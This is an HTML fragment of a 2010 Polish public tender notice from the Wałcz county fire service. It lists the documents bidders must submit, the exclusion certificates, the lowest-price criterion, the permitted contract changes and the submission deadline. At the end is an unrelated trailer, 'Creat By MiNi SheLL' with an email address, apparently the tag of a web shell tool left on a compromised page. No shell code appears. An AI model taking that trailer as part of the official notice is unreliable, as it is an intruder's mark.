<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi spełnienie tego warunku, jeżeli przedstawi informacje Banku lub Spółdzielczej Kasy Oszczędnościowo Kredytowej, w której posiada rachunek potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 20% wartości brutto składanej oferty wystawionej nie wcześnie j niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli zmiany będą dotyczyły:
a) zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia,
b) wydłużenia terminu, na który zawarto umowę, z powodów niezależnych od Wykonawcy,
c) zmiany stawki podatku VAT, w przypadku ustawowych zmian w tym zakresie,
d) zmiany danych Wykonawcy (siedziba, nazwa),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.strazwalcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu
siedziba zastępcza
ul. 12 Lutego 9
78-600 Wałcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 12:00, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu
siedziba zastępcza
ul. 12 Lutego 9
78-600 Wałcz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com